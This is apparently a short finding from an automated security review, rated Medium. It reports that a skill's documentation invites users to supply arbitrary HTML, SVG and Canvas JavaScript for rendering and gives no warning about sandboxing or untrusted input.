Missing User Warnings
Medium
- Confidence
- 91% confidence
- Finding
- The skill explicitly invites users to supply arbitrary HTML, SVG, and Canvas JavaScript for rendering, which creates a clear pathway for active content execution if the generated HTML is opened in a browser-like environment. Because the documentation frames this as normal usage and provides no warning, sandboxing requirements, or trust boundary guidance, users may process untrusted input and trigger script execution, data exfiltration, or local file abuse through embedded active content.
